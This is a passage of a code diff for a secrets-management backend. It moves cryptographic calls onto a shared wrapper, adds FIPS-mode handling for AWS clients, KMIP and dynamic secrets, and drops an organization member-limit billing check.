   SECRET_SCANNING_DATA_SOURCE_CREATE = "secret-scanning-data-source-create",
   SECRET_SCANNING_DATA_SOURCE_UPDATE = "secret-scanning-data-source-update",
@@ -1546,8 +1547,9 @@ interface UpdateFolderEvent {
   metadata: {
     environment: string;
     folderId: string;
-    oldFolderName: string;
+    oldFolderName?: string;
     newFolderName: string;
+    newFolderDescription?: string;
     folderPath: string;
   };
 }
@@ -1711,7 +1713,7 @@ interface SecretApprovalReopened {
 interface SecretApprovalRequest {
   type: EventType.SECRET_APPROVAL_REQUEST;
   metadata: {
-    committedBy: string;
+    committedBy?: string | null;
     secretApprovalRequestSlug: string;
     secretApprovalRequestId: string;
     eventType: SecretApprovalEvent;
@@ -3222,6 +3224,18 @@ interface PitCompareFolderStatesEvent {
   };
 }
 
+interface PitProcessNewCommitRawEvent {
+  type: EventType.PIT_PROCESS_NEW_COMMIT_RAW;
+  metadata: {
+    projectId: string;
+    environment: string;
+    secretPath: string;
+    message: string;
+    approvalId?: string;
+    commitId?: string;
+  };
+}
+
 interface SecretScanningDataSourceListEvent {
   type: EventType.SECRET_SCANNING_DATA_SOURCE_LIST;
   metadata: {
@@ -3658,6 +3672,7 @@ export type Event =
   | PitRevertCommitEvent
   | PitCompareFolderStatesEvent
   | PitGetFolderStateEvent
+  | PitProcessNewCommitRawEvent
   | SecretScanningDataSourceListEvent
   | SecretScanningDataSourceGetEvent
   | SecretScanningDataSourceCreateEvent

backend/src/ee/services/dynamic-secret/dynamic-secret-service.ts

@@ -6,6 +6,7 @@ import {
   ProjectPermissionDynamicSecretActions,
   ProjectPermissionSub
 } from "@app/ee/services/permission/project-permission";
+import { crypto } from "@app/lib/crypto";
 import { BadRequestError, NotFoundError } from "@app/lib/errors";
 import { OrderByDirection } from "@app/lib/types";
 import { TKmsServiceFactory } from "@app/services/kms/kms-service";
@@ -92,6 +93,12 @@ export const dynamicSecretServiceFactory = ({
       });
     }
 
+    if (provider.type === DynamicSecretProviders.MongoAtlas && crypto.isFipsModeEnabled()) {
+      throw new BadRequestError({
+        message: "MongoDB Atlas dynamic secret is not supported in FIPS mode of operation"
+      });
+    }
+
     const folder = await folderDAL.findBySecretPath(projectId, environmentSlug, path);
     if (!folder) {
       throw new NotFoundError({ message: `Folder with path '${path}' in environment '${environmentSlug}' not found` });

backend/src/ee/services/dynamic-secret/providers/aws-elasticache.ts

@@ -12,6 +12,8 @@ import handlebars from "handlebars";
 import { customAlphabet } from "nanoid";
 import { z } from "zod";
 
+import { CustomAWSHasher } from "@app/lib/aws/hashing";
+import { crypto } from "@app/lib/crypto";
 import { BadRequestError } from "@app/lib/errors";
 import { validateHandlebarTemplate } from "@app/lib/template/validate-handlebars";
 
@@ -39,8 +41,11 @@ type TDeleteElastiCacheUserInput = z.infer<typeof DeleteElasticCacheUserSchema>;
 const ElastiCacheUserManager = (credentials: TBasicAWSCredentials, region: string) => {
   const elastiCache = new ElastiCache({
     region,
+    useFipsEndpoint: crypto.isFipsModeEnabled(),
+    sha256: CustomAWSHasher,
     credentials
   });
+
   const infisicalGroup = "infisical-managed-group-elasticache";
 
   const ensureInfisicalGroupExists = async (clusterName: string) => {

backend/src/ee/services/dynamic-secret/providers/aws-iam.ts

@@ -17,10 +17,11 @@ import {
   RemoveUserFromGroupCommand
 } from "@aws-sdk/client-iam";
 import { AssumeRoleCommand, STSClient } from "@aws-sdk/client-sts";
-import { randomUUID } from "crypto";
 import { z } from "zod";
 
+import { CustomAWSHasher } from "@app/lib/aws/hashing";
 import { getConfig } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { BadRequestError, UnauthorizedError } from "@app/lib/errors";
 import { alphaNumericNanoId } from "@app/lib/nanoid";
 
@@ -49,6 +50,8 @@ export const AwsIamProvider = (): TDynamicProviderFns => {
     if (providerInputs.method === AwsIamAuthType.AssumeRole) {
       const stsClient = new STSClient({
         region: providerInputs.region,
+        useFipsEndpoint: crypto.isFipsModeEnabled(),
+        sha256: CustomAWSHasher,
         credentials:
           appCfg.DYNAMIC_SECRET_AWS_ACCESS_KEY_ID && appCfg.DYNAMIC_SECRET_AWS_SECRET_ACCESS_KEY
             ? {
@@ -60,7 +63,7 @@ export const AwsIamProvider = (): TDynamicProviderFns => {
 
       const command = new AssumeRoleCommand({
         RoleArn: providerInputs.roleArn,
-        RoleSessionName: `infisical-dynamic-secret-${randomUUID()}`,
+        RoleSessionName: `infisical-dynamic-secret-${crypto.nativeCrypto.randomUUID()}`,
         DurationSeconds: 900, // 15 mins
         ExternalId: projectId
       });
@@ -72,6 +75,8 @@ export const AwsIamProvider = (): TDynamicProviderFns => {
       }
       const client = new IAMClient({
         region: providerInputs.region,
+        useFipsEndpoint: crypto.isFipsModeEnabled(),
+        sha256: CustomAWSHasher,
         credentials: {
           accessKeyId: assumeRes.Credentials?.AccessKeyId,
           secretAccessKey: assumeRes.Credentials?.SecretAccessKey,
@@ -91,13 +96,17 @@ export const AwsIamProvider = (): TDynamicProviderFns => {
 
       // The SDK will automatically pick up credentials from the environment
       const client = new IAMClient({
-        region: providerInputs.region
+        region: providerInputs.region,
+        useFipsEndpoint: crypto.isFipsModeEnabled(),
+        sha256: CustomAWSHasher
       });
       return client;
     }
 
     const client = new IAMClient({
       region: providerInputs.region,
+      useFipsEndpoint: crypto.isFipsModeEnabled(),
+      sha256: CustomAWSHasher,
       credentials: {
         accessKeyId: providerInputs.accessKey,
         secretAccessKey: providerInputs.secretAccessKey

backend/src/ee/services/dynamic-secret/providers/github.ts

@@ -1,6 +1,7 @@
 import axios from "axios";
 import jwt from "jsonwebtoken";
 
+import { crypto } from "@app/lib/crypto";
 import { BadRequestError, InternalServerError } from "@app/lib/errors";
 import { alphaNumericNanoId } from "@app/lib/nanoid";
 import { IntegrationUrls } from "@app/services/integration-auth/integration-list";
@@ -40,7 +41,7 @@ export const GithubProvider = (): TDynamicProviderFns => {
 
     let appJwt: string;
     try {
-      appJwt = jwt.sign(jwtPayload, privateKey, { algorithm: "RS256" });
+      appJwt = crypto.jwt().sign(jwtPayload, privateKey, { algorithm: "RS256" });
     } catch (error) {
       let message = "Failed to sign JWT.";
       if (error instanceof jwt.JsonWebTokenError) {

backend/src/ee/services/dynamic-secret/providers/sql-database.ts

@@ -1,8 +1,8 @@
-import { randomInt } from "crypto";
 import handlebars from "handlebars";
 import knex from "knex";
 import { z } from "zod";
 
+import { crypto } from "@app/lib/crypto/cryptography";
 import { GatewayProxyProtocol, withGatewayProxy } from "@app/lib/gateway";
 import { alphaNumericNanoId } from "@app/lib/nanoid";
 import { validateHandlebarTemplate } from "@app/lib/template/validate-handlebars";
@@ -50,7 +50,7 @@ const generatePassword = (provider: SqlProviders, requirements?: PasswordRequire
       parts.push(
         ...Array(required.lowercase)
           .fill(0)
-          .map(() => chars.lowercase[randomInt(chars.lowercase.length)])
+          .map(() => chars.lowercase[crypto.randomInt(chars.lowercase.length)])
       );
     }
 
@@ -58,7 +58,7 @@ const generatePassword = (provider: SqlProviders, requirements?: PasswordRequire
       parts.push(
         ...Array(required.uppercase)
           .fill(0)
-          .map(() => chars.uppercase[randomInt(chars.uppercase.length)])
+          .map(() => chars.uppercase[crypto.randomInt(chars.uppercase.length)])
       );
     }
 
@@ -66,7 +66,7 @@ const generatePassword = (provider: SqlProviders, requirements?: PasswordRequire
       parts.push(
         ...Array(required.digits)
           .fill(0)
-          .map(() => chars.digits[randomInt(chars.digits.length)])
+          .map(() => chars.digits[crypto.randomInt(chars.digits.length)])
       );
     }
 
@@ -74,7 +74,7 @@ const generatePassword = (provider: SqlProviders, requirements?: PasswordRequire
       parts.push(
         ...Array(required.symbols)
           .fill(0)
-          .map(() => chars.symbols[randomInt(chars.symbols.length)])
+          .map(() => chars.symbols[crypto.randomInt(chars.symbols.length)])
       );
     }
 
@@ -89,12 +89,12 @@ const generatePassword = (provider: SqlProviders, requirements?: PasswordRequire
     parts.push(
       ...Array(remainingLength)
         .fill(0)
-        .map(() => allowedChars[randomInt(allowedChars.length)])
+        .map(() => allowedChars[crypto.randomInt(allowedChars.length)])
     );
 
     // shuffle the array to mix up the characters
     for (let i = parts.length - 1; i > 0; i -= 1) {
-      const j = randomInt(i + 1);
+      const j = crypto.randomInt(i + 1);
       [parts[i], parts[j]] = [parts[j], parts[i]];
     }
 

backend/src/ee/services/dynamic-secret/providers/vertica.ts

@@ -1,8 +1,8 @@
-import { randomInt } from "crypto";
 import handlebars from "handlebars";
 import knex, { Knex } from "knex";
 import { z } from "zod";
 
+import { crypto } from "@app/lib/crypto/cryptography";
 import { BadRequestError } from "@app/lib/errors";
 import { GatewayProxyProtocol, withGatewayProxy } from "@app/lib/gateway";
 import { logger } from "@app/lib/logger";
@@ -64,7 +64,7 @@ const generatePassword = (requirements?: PasswordRequirements) => {
       parts.push(
         ...Array(required.lowercase)
           .fill(0)
-          .map(() => chars.lowercase[randomInt(chars.lowercase.length)])
+          .map(() => chars.lowercase[crypto.randomInt(chars.lowercase.length)])
       );
     }
 
@@ -72,7 +72,7 @@ const generatePassword = (requirements?: PasswordRequirements) => {
       parts.push(
         ...Array(required.uppercase)
           .fill(0)
-          .map(() => chars.uppercase[randomInt(chars.uppercase.length)])
+          .map(() => chars.uppercase[crypto.randomInt(chars.uppercase.length)])
       );
     }
 
@@ -80,7 +80,7 @@ const generatePassword = (requirements?: PasswordRequirements) => {
       parts.push(
         ...Array(required.digits)
           .fill(0)
-          .map(() => chars.digits[randomInt(chars.digits.length)])
+          .map(() => chars.digits[crypto.randomInt(chars.digits.length)])
       );
     }
 
@@ -88,7 +88,7 @@ const generatePassword = (requirements?: PasswordRequirements) => {
       parts.push(
         ...Array(required.symbols)
           .fill(0)
-          .map(() => chars.symbols[randomInt(chars.symbols.length)])
+          .map(() => chars.symbols[crypto.randomInt(chars.symbols.length)])
       );
     }
 
@@ -103,12 +103,12 @@ const generatePassword = (requirements?: PasswordRequirements) => {
     parts.push(
       ...Array(remainingLength)
         .fill(0)
-        .map(() => allowedChars[randomInt(allowedChars.length)])
+        .map(() => allowedChars[crypto.randomInt(allowedChars.length)])
     );
 
     // shuffle the array to mix up the characters
     for (let i = parts.length - 1; i > 0; i -= 1) {
-      const j = randomInt(i + 1);
+      const j = crypto.randomInt(i + 1);
       [parts[i], parts[j]] = [parts[j], parts[i]];
     }
 

backend/src/ee/services/external-kms/providers/aws-kms.ts

@@ -1,6 +1,8 @@
 import { CreateKeyCommand, DecryptCommand, DescribeKeyCommand, EncryptCommand, KMSClient } from "@aws-sdk/client-kms";
 import { AssumeRoleCommand, STSClient } from "@aws-sdk/client-sts";
-import { randomUUID } from "crypto";
+
+import { CustomAWSHasher } from "@app/lib/aws/hashing";
+import { crypto } from "@app/lib/crypto/cryptography";
 
 import { ExternalKmsAwsSchema, KmsAwsCredentialType, TExternalKmsAwsSchema, TExternalKmsProviderFns } from "./model";
 
@@ -8,11 +10,13 @@ const getAwsKmsClient = async (providerInputs: TExternalKmsAwsSchema) => {
   if (providerInputs.credential.type === KmsAwsCredentialType.AssumeRole) {
     const awsCredential = providerInputs.credential.data;
     const stsClient = new STSClient({
-      region: providerInputs.awsRegion
+      region: providerInputs.awsRegion,
+      useFipsEndpoint: crypto.isFipsModeEnabled(),
+      sha256: CustomAWSHasher
     });
     const command = new AssumeRoleCommand({
       RoleArn: awsCredential.assumeRoleArn,
-      RoleSessionName: `infisical-kms-${randomUUID()}`,
+      RoleSessionName: `infisical-kms-${crypto.nativeCrypto.randomUUID()}`,
       DurationSeconds: 900, // 15mins
       ExternalId: awsCredential.externalId
     });
@@ -22,6 +26,8 @@ const getAwsKmsClient = async (providerInputs: TExternalKmsAwsSchema) => {
 
     const kmsClient = new KMSClient({
       region: providerInputs.awsRegion,
+      useFipsEndpoint: crypto.isFipsModeEnabled(),
+      sha256: CustomAWSHasher,
       credentials: {
         accessKeyId: response.Credentials.AccessKeyId,
         secretAccessKey: response.Credentials.SecretAccessKey,
@@ -34,6 +40,8 @@ const getAwsKmsClient = async (providerInputs: TExternalKmsAwsSchema) => {
   const awsCredential = providerInputs.credential.data;
   const kmsClient = new KMSClient({
     region: providerInputs.awsRegion,
+    useFipsEndpoint: crypto.isFipsModeEnabled(),
+    sha256: CustomAWSHasher,
     credentials: {
       accessKeyId: awsCredential.accessKey,
       secretAccessKey: awsCredential.secretKey

backend/src/ee/services/gateway/gateway-service.ts

@@ -1,11 +1,10 @@
-import crypto from "node:crypto";
-
 import { ForbiddenError } from "@casl/ability";
 import * as x509 from "@peculiar/x509";
 import { z } from "zod";
 
 import { KeyStorePrefixes, PgSqlLock, TKeyStoreFactory } from "@app/keystore/keystore";
 import { getConfig } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { BadRequestError, NotFoundError } from "@app/lib/errors";
 import { pingGatewayAndVerify } from "@app/lib/gateway";
 import { alphaNumericNanoId } from "@app/lib/nanoid";
@@ -149,9 +148,9 @@ export const gatewayServiceFactory = ({
 
       const alg = keyAlgorithmToAlgCfg(CertKeyAlgorithm.RSA_2048);
       // generate root CA
-      const rootCaKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+      const rootCaKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
       const rootCaSerialNumber = createSerialNumber();
-      const rootCaSkObj = crypto.KeyObject.from(rootCaKeys.privateKey);
+      const rootCaSkObj = crypto.nativeCrypto.KeyObject.from(rootCaKeys.privateKey);
       const rootCaIssuedAt = new Date();
       const rootCaKeyAlgorithm = CertKeyAlgorithm.RSA_2048;
       const rootCaExpiration = new Date(new Date().setFullYear(2045));
@@ -173,8 +172,8 @@ export const gatewayServiceFactory = ({
       const clientCaSerialNumber = createSerialNumber();
       const clientCaIssuedAt = new Date();
       const clientCaExpiration = new Date(new Date().setFullYear(2045));
-      const clientCaKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
-      const clientCaSkObj = crypto.KeyObject.from(clientCaKeys.privateKey);
+      const clientCaKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+      const clientCaSkObj = crypto.nativeCrypto.KeyObject.from(clientCaKeys.privateKey);
 
       const clientCaCert = await x509.X509CertificateGenerator.create({
         serialNumber: clientCaSerialNumber,
@@ -200,7 +199,7 @@ export const gatewayServiceFactory = ({
         ]
       });
 
-      const clientKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+      const clientKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
       const clientCertSerialNumber = createSerialNumber();
       const clientCert = await x509.X509CertificateGenerator.create({
         serialNumber: clientCertSerialNumber,
@@ -226,14 +225,14 @@ export const gatewayServiceFactory = ({
           new x509.ExtendedKeyUsageExtension([x509.ExtendedKeyUsage[CertExtendedKeyUsage.CLIENT_AUTH]], true)
         ]
       });
-      const clientSkObj = crypto.KeyObject.from(clientKeys.privateKey);
+      const clientSkObj = crypto.nativeCrypto.KeyObject.from(clientKeys.privateKey);
 
       // generate gateway ca
       const gatewayCaSerialNumber = createSerialNumber();
       const gatewayCaIssuedAt = new Date();
       const gatewayCaExpiration = new Date(new Date().setFullYear(2045));
-      const gatewayCaKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
-      const gatewayCaSkObj = crypto.KeyObject.from(gatewayCaKeys.privateKey);
+      const gatewayCaKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+      const gatewayCaSkObj = crypto.nativeCrypto.KeyObject.from(gatewayCaKeys.privateKey);
       const gatewayCaCert = await x509.X509CertificateGenerator.create({
         serialNumber: gatewayCaSerialNumber,
         subject: `O=${identityOrg},CN=Gateway CA`,
@@ -326,7 +325,7 @@ export const gatewayServiceFactory = ({
     );
 
     const gatewayCaAlg = keyAlgorithmToAlgCfg(orgGatewayConfig.rootCaKeyAlgorithm as CertKeyAlgorithm);
-    const gatewayCaSkObj = crypto.createPrivateKey({
+    const gatewayCaSkObj = crypto.nativeCrypto.createPrivateKey({
       key: orgKmsDecryptor({ cipherTextBlob: orgGatewayConfig.encryptedGatewayCaPrivateKey }),
       format: "der",
       type: "pkcs8"
@@ -337,7 +336,7 @@ export const gatewayServiceFactory = ({
       })
     );
 
-    const gatewayCaPrivateKey = await crypto.subtle.importKey(
+    const gatewayCaPrivateKey = await crypto.nativeCrypto.subtle.importKey(
       "pkcs8",
       gatewayCaSkObj.export({ format: "der", type: "pkcs8" }),
       gatewayCaAlg,
@@ -346,7 +345,7 @@ export const gatewayServiceFactory = ({
     );
 
     const alg = keyAlgorithmToAlgCfg(CertKeyAlgorithm.RSA_2048);
-    const gatewayKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+    const gatewayKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
     const certIssuedAt = new Date();
     // then need to periodically init
     const certExpireAt = new Date(new Date().setMonth(new Date().getMonth() + 1));
@@ -367,7 +366,7 @@ export const gatewayServiceFactory = ({
     ];
 
     const serialNumber = createSerialNumber();
-    const privateKey = crypto.KeyObject.from(gatewayKeys.privateKey);
+    const privateKey = crypto.nativeCrypto.KeyObject.from(gatewayKeys.privateKey);
     const gatewayCertificate = await x509.X509CertificateGenerator.create({
       serialNumber,
       subject: `CN=${identityId},O=${identityOrg},OU=Gateway`,
@@ -454,7 +453,7 @@ export const gatewayServiceFactory = ({
       })
     );
 
-    const privateKey = crypto
+    const privateKey = crypto.nativeCrypto
       .createPrivateKey({
         key: orgKmsDecryptor({ cipherTextBlob: orgGatewayConfig.encryptedClientPrivateKey }),
         format: "der",
@@ -588,7 +587,7 @@ export const gatewayServiceFactory = ({
       })
     );
 
-    const clientSkObj = crypto.createPrivateKey({
+    const clientSkObj = crypto.nativeCrypto.createPrivateKey({
       key: orgKmsDecryptor({ cipherTextBlob: orgGatewayConfig.encryptedClientPrivateKey }),
       format: "der",
       type: "pkcs8"

backend/src/ee/services/group/group-fns.ts

@@ -1,7 +1,7 @@
 import { Knex } from "knex";
 
 import { SecretKeyEncoding, TableName, TUsers } from "@app/db/schemas";
-import { decryptAsymmetric, encryptAsymmetric, infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { BadRequestError, ForbiddenRequestError, NotFoundError, ScimRequestError } from "@app/lib/errors";
 
 import {
@@ -94,14 +94,17 @@ const addAcceptedUsersToGroup = async ({
         });
       }
 
-      const botPrivateKey = infisicalSymmetricDecrypt({
-        keyEncoding: bot.keyEncoding as SecretKeyEncoding,
-        iv: bot.iv,
-        tag: bot.tag,
-        ciphertext: bot.encryptedPrivateKey
-      });
+      const botPrivateKey = crypto
+        .encryption()
+        .symmetric()
+        .decryptWithRootEncryptionKey({
+          keyEncoding: bot.keyEncoding as SecretKeyEncoding,
+          iv: bot.iv,
+          tag: bot.tag,
+          ciphertext: bot.encryptedPrivateKey
+        });
 
-      const plaintextProjectKey = decryptAsymmetric({
+      const plaintextProjectKey = crypto.encryption().asymmetric().decrypt({
         ciphertext: ghostUserLatestKey.encryptedKey,
         nonce: ghostUserLatestKey.nonce,
         publicKey: ghostUserLatestKey.sender.publicKey,
@@ -109,11 +112,10 @@ const addAcceptedUsersToGroup = async ({
       });
 
       const projectKeysToAdd = usersToAddProjectKeyFor.map((user) => {
-        const { ciphertext: encryptedKey, nonce } = encryptAsymmetric(
-          plaintextProjectKey,
-          user.publicKey,
-          botPrivateKey
-        );
+        const { ciphertext: encryptedKey, nonce } = crypto
+          .encryption()
+          .asymmetric()
+          .encrypt(plaintextProjectKey, user.publicKey, botPrivateKey);
         return {
           encryptedKey,
           nonce,

backend/src/ee/services/kmip/kmip-service.ts

@@ -1,7 +1,7 @@
 import { ForbiddenError } from "@casl/ability";
 import * as x509 from "@peculiar/x509";
-import crypto, { KeyObject } from "crypto";
 
+import { crypto } from "@app/lib/crypto/cryptography";
 import { BadRequestError, InternalServerError, NotFoundError } from "@app/lib/errors";
 import { isValidIp } from "@app/lib/ip";
 import { ms } from "@app/lib/ms";
@@ -67,6 +67,12 @@ export const kmipServiceFactory = ({
     description,
     permissions
   }: TCreateKmipClientDTO) => {
+    if (crypto.isFipsModeEnabled()) {
+      throw new BadRequestError({
+        message: "KMIP is currently not supported in FIPS mode of operation."
+      });
+    }
+
     const { permission } = await permissionService.getProjectPermission({
       actor,
       actorId,
@@ -292,7 +298,7 @@ export const kmipServiceFactory = ({
     }
 
     const alg = keyAlgorithmToAlgCfg(keyAlgorithm);
-    const leafKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+    const leafKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
 
     const extensions: x509.Extension[] = [
       new x509.BasicConstraintsExtension(false),
@@ -311,13 +317,13 @@ export const kmipServiceFactory = ({
 
     const caAlg = keyAlgorithmToAlgCfg(kmipConfig.caKeyAlgorithm as CertKeyAlgorithm);
 
-    const caSkObj = crypto.createPrivateKey({
+    const caSkObj = crypto.nativeCrypto.createPrivateKey({
       key: decryptor({ cipherTextBlob: kmipConfig.encryptedClientIntermediateCaPrivateKey }),
       format: "der",
       type: "pkcs8"
     });
 
-    const caPrivateKey = await crypto.subtle.importKey(
+    const caPrivateKey = await crypto.nativeCrypto.subtle.importKey(
       "pkcs8",
       caSkObj.export({ format: "der", type: "pkcs8" }),
       caAlg,
@@ -338,7 +344,7 @@ export const kmipServiceFactory = ({
       extensions
     });
 
-    const skLeafObj = KeyObject.from(leafKeys.privateKey);
+    const skLeafObj = crypto.nativeCrypto.KeyObject.from(leafKeys.privateKey);
 
     const rootCaCert = new x509.X509Certificate(decryptor({ cipherTextBlob: kmipConfig.encryptedRootCaCertificate }));
     const serverIntermediateCaCert = new x509.X509Certificate(
@@ -417,8 +423,8 @@ export const kmipServiceFactory = ({
 
     // generate root CA
     const rootCaSerialNumber = createSerialNumber();
-    const rootCaKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
-    const rootCaSkObj = KeyObject.from(rootCaKeys.privateKey);
+    const rootCaKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+    const rootCaSkObj = crypto.nativeCrypto.KeyObject.from(rootCaKeys.privateKey);
     const rootCaIssuedAt = new Date();
     const rootCaExpiration = new Date(new Date().setFullYear(new Date().getFullYear() + 20));
 
@@ -440,8 +446,8 @@ export const kmipServiceFactory = ({
     const serverIntermediateCaSerialNumber = createSerialNumber();
     const serverIntermediateCaIssuedAt = new Date();
     const serverIntermediateCaExpiration = new Date(new Date().setFullYear(new Date().getFullYear() + 10));
-    const serverIntermediateCaKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
-    const serverIntermediateCaSkObj = KeyObject.from(serverIntermediateCaKeys.privateKey);
+    const serverIntermediateCaKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+    const serverIntermediateCaSkObj = crypto.nativeCrypto.KeyObject.from(serverIntermediateCaKeys.privateKey);
 
     const serverIntermediateCaCert = await x509.X509CertificateGenerator.create({
       serialNumber: serverIntermediateCaSerialNumber,
@@ -471,8 +477,8 @@ export const kmipServiceFactory = ({
     const clientIntermediateCaSerialNumber = createSerialNumber();
     const clientIntermediateCaIssuedAt = new Date();
     const clientIntermediateCaExpiration = new Date(new Date().setFullYear(new Date().getFullYear() + 10));
-    const clientIntermediateCaKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
-    const clientIntermediateCaSkObj = KeyObject.from(clientIntermediateCaKeys.privateKey);
+    const clientIntermediateCaKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+    const clientIntermediateCaSkObj = crypto.nativeCrypto.KeyObject.from(clientIntermediateCaKeys.privateKey);
 
     const clientIntermediateCaCert = await x509.X509CertificateGenerator.create({
       serialNumber: clientIntermediateCaSerialNumber,
@@ -637,7 +643,8 @@ export const kmipServiceFactory = ({
     }
 
     const alg = keyAlgorithmToAlgCfg(keyAlgorithm);
-    const leafKeys = await crypto.subtle.generateKey(alg, true, ["sign", "verify"]);
+
+    const leafKeys = await crypto.nativeCrypto.subtle.generateKey(alg, true, ["sign", "verify"]);
 
     const extensions: x509.Extension[] = [
       new x509.BasicConstraintsExtension(false),
@@ -685,13 +692,13 @@ export const kmipServiceFactory = ({
       cipherTextBlob: kmipOrgConfig.encryptedServerIntermediateCaChain
     }).toString("utf-8");
 
-    const caSkObj = crypto.createPrivateKey({
+    const caSkObj = crypto.nativeCrypto.createPrivateKey({
       key: decryptor({ cipherTextBlob: kmipOrgConfig.encryptedServerIntermediateCaPrivateKey }),
       format: "der",
       type: "pkcs8"
     });
 
-    const caPrivateKey = await crypto.subtle.importKey(
+    const caPrivateKey = await crypto.nativeCrypto.subtle.importKey(
       "pkcs8",
       caSkObj.export({ format: "der", type: "pkcs8" }),
       caAlg,
@@ -712,7 +719,7 @@ export const kmipServiceFactory = ({
       extensions
     });
 
-    const skLeafObj = KeyObject.from(leafKeys.privateKey);
+    const skLeafObj = crypto.nativeCrypto.KeyObject.from(leafKeys.privateKey);
     const certificateChain = `${caCertObj.toString("pem")}\n${decryptedCaCertChain}`.trim();
 
     await kmipOrgServerCertificateDAL.create({

backend/src/ee/services/ldap-config/ldap-config-service.ts

@@ -1,11 +1,11 @@
 import { ForbiddenError } from "@casl/ability";
-import jwt from "jsonwebtoken";
 
 import { OrgMembershipStatus, TableName, TLdapConfigsUpdate, TUsers } from "@app/db/schemas";
 import { TGroupDALFactory } from "@app/ee/services/group/group-dal";
 import { addUsersToGroupByUserIds, removeUsersFromGroupByUserIds } from "@app/ee/services/group/group-fns";
 import { TUserGroupMembershipDALFactory } from "@app/ee/services/group/user-group-membership-dal";
 import { getConfig } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto";
 import { BadRequestError, ForbiddenRequestError, NotFoundError } from "@app/lib/errors";
 import { AuthMethod, AuthTokenType } from "@app/services/auth/auth-type";
 import { TAuthTokenServiceFactory } from "@app/services/auth-token/auth-token-service";
@@ -361,13 +361,6 @@ export const ldapConfigServiceFactory = ({
       });
     } else {
       const plan = await licenseService.getPlan(orgId);
-      if (plan?.slug !== "enterprise" && plan?.memberLimit && plan.membersUsed >= plan.memberLimit) {
-        // limit imposed on number of members allowed / number of members used exceeds the number of members allowed
-        throw new BadRequestError({
-          message: "Failed to create new member via LDAP due to member limit reached. Upgrade plan to add more members."
-        });
-      }
-
       if (plan?.slug !== "enterprise" && plan?.identityLimit && plan.identitiesUsed >= plan.identityLimit) {
         // limit imposed on number of identities allowed / number of identities used exceeds the number of identities allowed
         throw new BadRequestError({
@@ -536,7 +529,7 @@ export const ldapConfigServiceFactory = ({
     const isUserCompleted = Boolean(user.isAccepted);
     const userEnc = await userDAL.findUserEncKeyByUserId(user.id);
 
-    const providerAuthToken = jwt.sign(
+    const providerAuthToken = crypto.jwt().sign(
       {
         authTokenType: AuthTokenType.PROVIDER_TOKEN,
         userId: user.id,

backend/src/ee/services/license/licence-enums.ts

@@ -1,5 +1,4 @@
 export const BillingPlanRows = {
-  MemberLimit: { name: "Organization member limit", field: "memberLimit" },
   IdentityLimit: { name: "Organization identity limit", field: "identityLimit" },
   WorkspaceLimit: { name: "Project limit", field: "workspaceLimit" },
   EnvironmentLimit: { name: "Environment limit", field: "environmentLimit" },

backend/src/ee/services/license/license-fns.ts

@@ -58,7 +58,8 @@ export const getDefaultOnPremFeatures = (): TFeatureSet => ({
   sshHostGroups: false,
   secretScanning: false,
   enterpriseSecretSyncs: false,
-  enterpriseAppConnections: false
+  enterpriseAppConnections: false,
+  fips: false
 });
 
 export const setupLicenseRequestWithStore = (

backend/src/ee/services/license/license-service.ts

@@ -442,9 +442,7 @@ export const licenseServiceFactory = ({
         rows: data.rows.map((el) => {
           let used = "-";
 
-          if (el.name === BillingPlanRows.MemberLimit.name) {
-            used = orgMembersUsed.toString();
-          } else if (el.name === BillingPlanRows.WorkspaceLimit.name) {
+          if (el.name === BillingPlanRows.WorkspaceLimit.name) {
             used = projectCount.toString();
           } else if (el.name === BillingPlanRows.IdentityLimit.name) {
             used = (identityUsed + orgMembersUsed).toString();
@@ -464,12 +462,10 @@ export const licenseServiceFactory = ({
         const allowed = onPremFeatures[field as keyof TFeatureSet];
         let used = "-";
 
-        if (field === BillingPlanRows.MemberLimit.field) {
-          used = orgMembersUsed.toString();
-        } else if (field === BillingPlanRows.WorkspaceLimit.field) {
+        if (field === BillingPlanRows.WorkspaceLimit.field) {
           used = projectCount.toString();
         } else if (field === BillingPlanRows.IdentityLimit.field) {
-          used = identityUsed.toString();
+          used = (identityUsed + orgMembersUsed).toString();
         }
 
         return {

backend/src/ee/services/license/license-types.ts

@@ -75,6 +75,7 @@ export type TFeatureSet = {
   secretScanning: false;
   enterpriseSecretSyncs: false;
   enterpriseAppConnections: false;
+  fips: false;
 };
 
 export type TOrgPlansTableDTO = {

backend/src/ee/services/oidc/oidc-config-service.ts

@@ -1,6 +1,5 @@
 /* eslint-disable @typescript-eslint/no-unsafe-call */
 import { ForbiddenError } from "@casl/ability";
-import jwt from "jsonwebtoken";
 import { Issuer, Issuer as OpenIdIssuer, Strategy as OpenIdStrategy, TokenSet } from "openid-client";
 
 import { OrgMembershipStatus, TableName, TUsers } from "@app/db/schemas";
@@ -13,6 +12,7 @@ import { TLicenseServiceFactory } from "@app/ee/services/license/license-service
 import { OrgPermissionActions, OrgPermissionSubjects } from "@app/ee/services/permission/org-permission";
 import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types";
 import { getConfig } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto";
